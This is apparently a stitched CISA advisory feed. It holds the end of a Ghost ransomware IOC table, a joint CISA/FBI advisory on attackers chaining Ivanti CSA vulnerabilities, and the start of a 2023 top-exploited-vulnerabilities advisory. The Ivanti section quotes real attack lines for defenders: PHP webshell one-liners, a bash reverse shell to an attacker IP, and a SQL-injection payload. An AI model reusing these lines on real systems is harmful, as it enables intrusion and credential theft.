</tr> <tr> <td>ElysiumO.exe</td> <td> <p>29e44e8994197bdb0c2be6fc5dfc15c2</p> <p>c9e35b5c1dc8856da25965b385a26ec4</p> <p>d1c5e7b8e937625891707f8b4b594314</p> </td> </tr> <tr> <td>Locker.exe</td> <td>ef6a213f59f3fbee2894bd6734bbaed2</td> </tr> <tr> <td>iex.txt, pro.txt (IOX)</td> <td>ac58a214ce7deb3a578c10b97f93d9c3</td> </tr> <tr> <td>x86.log (IOX)</td> <td> <p>c3b8f6d102393b4542e9f951c9435255</p> <p>0a5c4ad3ec240fbfd00bdc1d36bd54eb</p> </td> </tr> <tr> <td>sp.txt (IOX)</td> <td>ff52fdf84448277b1bc121f592f753c5</td> </tr> <tr> <td>main.txt (IOX)</td> <td>a2fd181f57548c215ac6891d000ec6b9</td> </tr> <tr> <td>isx.txt (IOX)</td> <td>625bd7275e1892eac50a22f8b4a6355d</td> </tr> <tr> <td>sock.txt (IOX)</td> <td>db38ef2e3d4d8cb785df48f458b35090</td> </tr> </tbody> </table> </div> <h3>Ransom Email Addresses</h3> <p><strong>Table 3</strong> is a subset of ransom email addresses that have been included in Ghost ransom notes.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Ransom Email Addresses</em></caption> <thead> <tr> <th colspan="3" role="columnheader" data-tablesaw-priority="persist">Email Addresses</th> </tr> </thead> <tbody> <tr> <td>asauribe@tutanota.com</td> <td>ghostbackup@skiff.com</td> <td>rainbowforever@tutanota.com</td> </tr> <tr> <td>cringghost@skiff.com</td> <td>ghosts1337 Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a US-CERT Alerts urn:uuid:aa57077c-fae3-e8e6-8d0e-9c5246ca6ad0 Wed, 15 Jan 2025 17:26:11 +0000 <p><strong>Note:&nbsp;</strong>The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see <a href="https://www.cisa.gov/news-events/alerts/2025/01/08/ivanti-releases-security-updates-connect-secure-policy-secure-and-zta-gateways" title="Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways">Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways</a>.</p> <h2><strong>Summary</strong></h2> <p>The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8963" title="CVE-2024-8963 Detail">CVE-2024-8963</a>, an administrative bypass vulnerability; <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9379" title="CVE-2024-9379 Detail">CVE-2024-9379</a>, a SQL injection vulnerability; and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8190" title="CVE-2024-8190 Detail">CVE-2024-8190</a>&nbsp;and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9380" title="CVE-2024-9380 Detail">CVE-2024-9380</a>, remote code execution vulnerabilities.</p> <p>According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.</p> <p>All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</p> <p>Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA.&nbsp;Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/aa25-022a-threat-actors-chained-vulnerabilities-in-ivanti-cloud-service-applications.pdf" class="c-file__link" target="_blank">AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications</a> <span class="c-file__size">(PDF, 756.92 KB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/AA25-022A.stix_.xml" class="c-file__link" target="_blank">AA25-022A STIX XML</a> <span class="c-file__size">(XML, 105.56 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/AA5-022A-Threat-Actors-Chain-Vulnerabilities-In-Ivanti-Cloud-Service-Applications.stix_.json" class="c-file__link" target="_blank">AA25-022A STIX JSON</a> <span class="c-file__size">(JSON, 76.91 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the&nbsp;<a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <p>In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and&nbsp;CVE-2024-8963.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US" title="Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)">2</a>][<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US" title="Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)">3</a>] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</p> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8963" title="CVE-2024-8963 Detail">CVE-2024-8963</a> [<a href="https://cwe.mitre.org/data/definitions/22.html" title="CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')">CWE-22: Path Traversal</a>] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [<a href="https://cwe.mitre.org/data/definitions/78.html" title="CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')">CWE-78: OS Command Injection</a>], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>].[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US" title="Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)">2</a>][<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US" title="Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)">3</a>]</li> <li>CVE-2024-9379 [<a href="https://cwe.mitre.org/data/definitions/89.html" title="CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE-89: SQL Injection</a>] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</li> <li>CVE-2024-9380 [<a href="https://cwe.mitre.org/data/definitions/77.html" title="CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')">CWE-77: Command Injection</a>] allows a remote authenticated attacker with admin privileges to obtain RCE.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</li> </ul> <p>According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[<a href="https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa" title="Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA">4</a>] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its&nbsp;<a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>.</p> <p>According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.</p> <h3>Exploit Chain 1</h3> <p>The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a&nbsp;<code>nobody</code> user [<a href="https://attack.mitre.org/versions/v16/techniques/T1564/002/" title="Hide Artifacts: Hidden Users">T1564.002</a>], the threat actors first sent a&nbsp;<code>GET</code> request to&nbsp;<code>datetime.php</code> to acquire session and cross-site request forgery (CSRF) tokens using&nbsp;<code>GET /client/index.php%3F.php/gsb/datetime[.]php</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. They followed this in quick succession with a&nbsp;<code>POST</code> request to the same endpoint, using the&nbsp;<code>TIMEZONE</code> input field to manipulate the&nbsp;<code>setSystemTimeZone</code> function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>]. <strong>Note:</strong> The actors used multiple script variations. See <strong>Appendix A</strong> for examples of encoded and decoded scripts.</p> <p>In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>]. In other cases, the threat actors leveraged an executable matching the regular expression&nbsp;<code>php\w{6}</code> located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.</p> <p>After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a&nbsp;<code>GET</code> request to&nbsp;<code>/gsb/reports[.]php</code>. They immediately followed this with a&nbsp;<code>POST</code> request using the&nbsp;<code>TW_ID</code> input field to execute code to implant webshells for persistence [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>].</p> <p>In one confirmed compromise, the threat actors tried to create webshells using two different paths:</p> <ul> <li><code>echo "&lt;?php system(@</code><br><code>\$_REQUEST['a']);"&gt;/opt/ivanti/csa/broker/webroot/client/help.php</code></li> <li><code>echo "&lt;?php system('/bin/sudo '. @</code><br><code>\$_REQUEST['a']);" &gt; /opt/landesk/broker/webroot/gsb/help.php</code></li> </ul> <p>In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel:&nbsp;<code>bash -i &gt;&amp;/dev/tcp/107.173.89[.]16/8000 0&gt;&amp;1</code>.</p> <p>In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used&nbsp;<code>sudo</code> commands to disable the vulnerability in&nbsp;<code>DateTimeTab.php</code>, modify and remove webshells, and remove evidence of exploitation [<a href="https://attack.mitre.org/versions/v16/techniques/T1548/003/" title="Abuse Elevation Control Mechanism: Sudo and Sudo Caching">T1548.003</a>]. See <strong>Appendix B</strong> for the list of&nbsp;<code>sudo</code> commands used.</p> <h4><strong>Lateral Movement</strong></h4> <p>In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [<a href="https://attack.mitre.org/versions/v16/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a>].</p> <h3>Exploit Chain 2</h3> <p>In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using&nbsp;<code>GET /client/index.php%3f.php/gsb/broker.php</code> for initial access.</p> <p>After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed&nbsp;<code>GET</code> and&nbsp;<code>POST</code> requests in quick succession to&nbsp;<code>/client/index.php%3F.php/gsb/broker.php</code>. In the&nbsp;<code>POST</code> body, threat actors entered the following string in the lockout attempts input box:&nbsp;<code>LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;/.k''', NOW(), 10)</code>. The first portion of the command&nbsp;(LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [<a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the&nbsp;<code>user_info</code> table.</p> <p>After inserting valid bash code as a user in the&nbsp;<code>user_info</code> table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran&nbsp;<code>echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;./k</code> as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>]. However, there were no observations that the threat actors were successful.</p> <h3>Detection of Activity</h3> <p>According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.</p> <h4><strong>Victim Organization 1</strong></h4> <p>The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.</p> <h4><strong>Victim Organization 2</strong></h4> <p>This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.</p> <h4><strong>Victim Organization 3</strong></h4> <p>This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.</p> <h2><strong>Indicators of Compromise</strong></h2> <p>See <strong>Table 1</strong> through <strong>Table 3</strong> for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.</p> <p><strong>Disclaimer:</strong> Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;1: IP Address Used for Credential Theft, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File Name</th> <th role="columnheader">IP Address</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>142.171.217[.]195</td> <td>/var/log/messages</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>154.64.226[.]166</td> <td>/var/log/messages-20240904.gz</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>216.131.75[.]53</td> <td>&nbsp;</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>23.236.66[.]97</td> <td>/var/log/messages-20240905.gz</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>38.207.159[.]76</td> <td>/var/log/messages-20240906.gz</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File Name</th> <th role="columnheader">IP Address</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>&nbsp;</td> <td>149.154.167[.]41</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>95.161.76[.]100</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/E50vtqmJP5aa</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/RBKuU8gicWt</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/frdZ9L18R7Nx</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxp://ip.sb</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td> <p>hxxps://pan.xj.hk/d/</p> <p>6401646e701f5f47518ecef48a308a36/redis</p> </td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>108.174.199[.]200</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>206.189.156[.]69</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>108.174.199[.]200/Xa27efd2.tmp</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Additional IOCs Derived from Incident Response, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Type</th> <th role="columnheader">IOC</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>Ipv4</td> <td>107.173.89[.]16</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>38.207.159[.]76</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>154.64.226[.]166</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>156.234.193[.]18</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>216.131.75[.]53</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>205.169.39[.]11</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>23.236.66[.]97</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>149.154.176[.]41</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>95.161.76[.]100</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>108.174.199[.]200</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>206.189.156[.]69</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>67.217.228[.]83</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>203.160.72[.]174</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4 2023 Top Routinely Exploited Vulnerabilities https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a US-CERT Alerts urn:uuid:631c611d-e3ca-6ae0-13e0-15eec5fa0191 Fri, 08 Nov 2024 21:04:23 +0000 <h2><strong>Summary</strong></h2> <p>The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):</p> <ul> <li><strong>United States: </strong>The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA)</li> <li><strong>Australia:</strong> Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)</li> <li><strong>Canada: </strong>Canadian Centre for Cyber Security (CCCS)</li> <li><strong>New Zealand:</strong> New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)</li> <li><strong>United Kingdom:&nbsp;</strong>National Cyber Security Centre (NCSC-UK)</li> </ul> <p>This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.</p> <p>The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to&nbsp;implement the following recommendations, and those found within the <strong>Mitigations</strong> section of this advisory, to reduce the risk of compromise by malicious cyber actors.</p> <ul> <li><strong>Vendors, designers, and developers</strong>. Implement <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">secure by design and default principles and tactics</a> to reduce the prevalence of vulnerabilities in your software. <ul> <li><strong>Follow the&nbsp;</strong><a href="https://csrc.nist.gov/publications/detail/sp/800-218/final"><strong>SP 800-218&nbsp;</strong></a><a href="https://csrc.nist.gov/publications/detail/sp/800-218/final" title="Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities">Secure Software Development Framework (SSDF)</a> and implement secure by design practices into each stage of the software development life cycle (SDLC). Establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.</li> <li><strong>Prioritize secure by default configurations</strong>, such as eliminating default passwords and not requiring additional configuration changes to enhance product security.</li> <li>Ensure that published CVEs include the proper CWE field, identifying the root cause of the vulnerability.</li> </ul> </li> <li><strong>End-user organizations:</strong> <ul> <li><strong>Apply timely patches to systems</strong>.<br><strong>Note:</strong> If CVEs identified in this advisory have not been patched, check for signs of compromise before patching.</li> <li><strong>Implement a centralized patch management system.</strong></li> <li>Use security tools such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.</li> <li><strong>Ask your software providers to discuss their secure by design program</strong>, provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.</li> </ul> </li> </ul> <h2><strong>Purpose</strong></h2> <p>The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2024-11/aa24-317a-2023-top-routinely-exploited-vulnerabilities.pdf" class="c-file__link" target="_blank">AA24-317A 2023 Top Routinely Exploited Vulnerabilities</a> <span class="c-file__size">(PDF, 907.24 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <h3>Key Findings</h3> <p>In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.&nbsp;</p> <p>Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.</p> <h4><strong>Cybersecurity Efforts to Include</strong></h4> <p><strong>Implementing security-centered product development lifecycles. Software developers&nbsp;</strong>deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities.</p> <p><strong>Increasing incentives for responsible vulnerability disclosure.&nbsp;</strong>Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures.</p> <p><strong>Using sophisticated endpoint detection and response (EDR) tools. End users&nbsp;</strong>leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions.</p> <p>Top Routinely Exploited Vulnerabilities</p> <p>Listed in <strong>Table 1</strong> are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below.</p> <ul> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-3519" title="CVE-2023-3519 - Critical">CVE-2023-3519</a>: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway. <ul> <li>Allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using a HTTP GET request.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-4966" title="CVE-2023-4966 - Critical">CVE-2023-4966</a>:&nbsp;This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway. <ul> <li>Allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" title="CVE-2023-20198 - Critical">CVE-2023-20198</a>:&nbsp;This vulnerability affects Cisco IOS XE Web UI. <ul> <li>Allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" title="CVE-2023-20273 - High">CVE-2023-20273</a><strong>:&nbsp;</strong>This vulnerability affects Cisco IOS XE, following activity from CVE-2023-20198. <ul> <li>Allows privilege escalation, once a local user has been created, to root privileges.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-27997" title="CVE-2023-27997 - High">CVE-2023-27997</a>:&nbsp;This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN. <ul> <li>Allows a remote user to craft specific requests to execute arbitrary code or commands.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-34362" title="CVE-2023-34362 - Critical">CVE-2023-34362</a>: This vulnerability affects Progress MOVEit Transfer. <ul> <li>Allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token.</li> <li>Allows a malicious cyber actor to obtain remote code execution via this access by abusing a deserialization call.</li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-22515" title="CVE-2023-22515 - Critical">CVE-2023-22515</a>:&nbsp;This vulnerability affects Atlassian Confluence Data Center and Server. <ul> <li>Allows exploit of an improper input validation issue. <ul> <li>Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time.</li> <li>The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution.</li> </ul> </li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2021-44228" title="CVE-2021-44228 - Critical">CVE-2021-44228</a><strong>:</strong> This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open source logging framework incorporated into thousands of products worldwide. <ul> <li>&nbsp;Allows the execution of arbitrary code. <ul> <li>An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code.</li> <li>The request allows a cyber actor to take full control of a system.</li> <li>The actor can then steal information, launch ransomware, or conduct other malicious activity.</li> <li>Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021.</li> </ul> </li> </ul> </li> <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-2868" title="CVE-2023-2868 - Critical">CVE-2023-2868</a><strong>:&nbsp;</strong>This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance. <ul> <li>Allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance.</li> </ul> </li> <li><a 